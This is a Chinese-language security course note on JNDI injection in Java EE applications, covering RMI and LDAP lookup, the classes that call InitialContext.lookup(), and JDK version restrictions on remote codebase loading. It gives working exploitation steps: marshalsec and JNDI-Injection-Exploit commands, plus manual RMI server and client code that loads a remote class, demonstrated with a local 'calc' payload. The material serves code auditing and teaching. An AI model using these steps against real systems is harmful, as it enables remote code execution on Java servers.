第47天:Web开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&DNS服务&高版本限制绕过

#知识点
1、安全开发-JavaEE-JNDI注入-LADP&RMI&DNS等

2、安全开发-JavaEE-JNDI注入-项目工具&手工原理等

|--------|--------------------------------------------------------|
| 协议 | 作用 |
| LDAP | 轻量级目录访问协议,约定了 Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容 |
| RMI | JAVA 远程方法协议,该协议用于远程调用应用程序编程接口,使客户机上运行的程序可以调用远程服务器上的对象 |
| DNS | 域名服务 |
| CORBA | 公共对象请求代理体系结构 |

思考明白:

什么是jndi注入

为什么有jndi注入

JDNI注入安全问题

JDNI注入利用条件

参考:https://blog.csdn.net/dupei/article/details/120534024

一、JNDI注入-RMI&LDAP服务

1、JNDI全称为 Java Naming and DirectoryInterface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。

RMI:远程方法调用注册表

LDAP:轻量级目录访问协议

2、调用检索:

Java为了将Object对象存储在Naming或Directory服务下,提供了Naming Reference功能,对象可以通过绑定Reference存储在Naming或Directory服务下,比如RMI、LDAP等。javax.naming.InitialContext.lookup()

①在RMI服务中调用了InitialContext.lookup()的类有:

org.springframework.transaction.jta.JtaTransactionManager.readObject()

com.sun.rowset.JdbcRowSetImpl.execute()

javax.management.remote.rmi.RMIConnector.connect()

org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName(String sfJNDIName)

②在LDAP服务中调用了InitialContext.lookup()的类有:

InitialDirContext.lookup()

Spring LdapTemplate.lookup()

LdapTemplate.lookupContext()

总结:代码审计时,重点关注源码或者依赖jar包是否有类用到了InitialContext类,并调用了其中的lookup()方法,即InitialContext.lookup()->若lookup()中的参数可控rmi/ldap则可形成rce

三、JNDI工具注入(两款工具):

项目1:https://github.com/mbechler/marshalsec #工具使用

在当前目录用python创建一个网站

1、编译调用对象

javac calc.java ->生成calc.class文件

2、使用利用工具生成调用协议(rmi,ldap)

①LDAP:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Calc

->http://127.0.0.1:8888为启动的本地网站,Calc为编译生成的Calc.class文件的文件名

②RMI:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8888/#Calc

->http://127.0.0.1:8888为启动的本地网站,Calc为编译生成的Calc.class文件的文件名

3、将生成的Class存放访问路径

项目2:https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A xx.xx.xx.xx

四、JNDI注入手工:

//bind:将名称绑定到对象中;

//lookup:通过名字检索执行的对象;

//Reference类表示对存在于命名/目录系统以外的对象的引用。

//Reference参数:

//className:远程加载时所使用的类名;

//classFactory:加载的class中需要实例化类的名称;

//classFactoryLocation:远程加载类的地址,提供classes数据的地址可以是file/ftp/http等协议;

1、Server注册监听(服务端)

Registry registry = LocateRegistry.createRegistry(7778);

Reference reference = new Reference("calc", "calc", "http://127.0.0.1:8089/");

ReferenceWrapper wrapper = new ReferenceWrapper(reference);

registry.bind("RCE", wrapper);

启动起来端口8089

python启动本地网站监听8089

要执行命名Test文件的编译文件Test.class放到网站目录下

2、Clinet(客户端)连接触发

String uri = "rmi://127.0.0.1:7778/RCE";

InitialContext initialContext = new InitialContext();

initialContext.lookup(uri);

运行:

五、JDK高版本注入绕过:

这个版本指的运行这个Java程序运行的jdk版本号,不是在使用工具时,工具jar包需要的版本

JDK 6u45、7u21之后:

java.rmi.server.useCodebaseOnly的默认值被设置为true。当该值为true时,将禁用自动加载远程类文件,仅从CLASSPATH和当前JVM的java.rmi.server.codebase指定路径加载类文件。使用这个属性来防止客户端VM从其他Codebase地址上动态加载类,增加RMI ClassLoader安全性。

JDK 6u141、7u131、8u121之后:

增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。

JDK 6u211、7u201、8u191之后:

增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。

高版本绕过:

见后续Java安全篇章课程将讲到

总结:

1、知道JNID注入触发原理->代码审计时,重点关注源码或者依赖jar包是否有类用到了InitialContext类,并调用了其中的lookup()方法,即InitialContext.lookup()->若lookup()中的参数可控rmi/ldap则可形成rce

2、会使用两款工具JNDI-Injection-Exploit与marshalsec,以及手工注入

3、知道JDK高版本的JNDI注入rmi&ldap绕过

相关推荐
运维管理17 小时前
H3C SecPath W2000-G[AK]系列Web应用防火墙 典型配置举例(E6711 E6712 E6713)-6W108-H3C 官方配置
服务器·网络·php
. . . . .17 小时前
Egg框架深入
java·开发语言
RainCity17 小时前
Java Swing 自定义组件库分享(十三)
java·笔记·后端
C+-C资深大佬17 小时前
python while循环
服务器·开发语言·python
Tian_Hang17 小时前
eclipse ditto 学习笔记
运维·服务器·开发语言·javascript·3d
iCxhust18 小时前
linux目录是否保存在硬盘 启动后读入解析的
linux·运维·服务器
懒鸟一枚18 小时前
Linux 系统 Service 服务配置详解
linux·服务器·网络
livemetee18 小时前
【关于Spring声明式事务】
java·后端·spring
倒流时光三十年18 小时前
Java 内存模型(JMM)通俗解释
java·开发语言
敖行客 Allthinker18 小时前
企业级多台服务器组装 K3s 高性能集群实战指南
运维·服务器·团队开发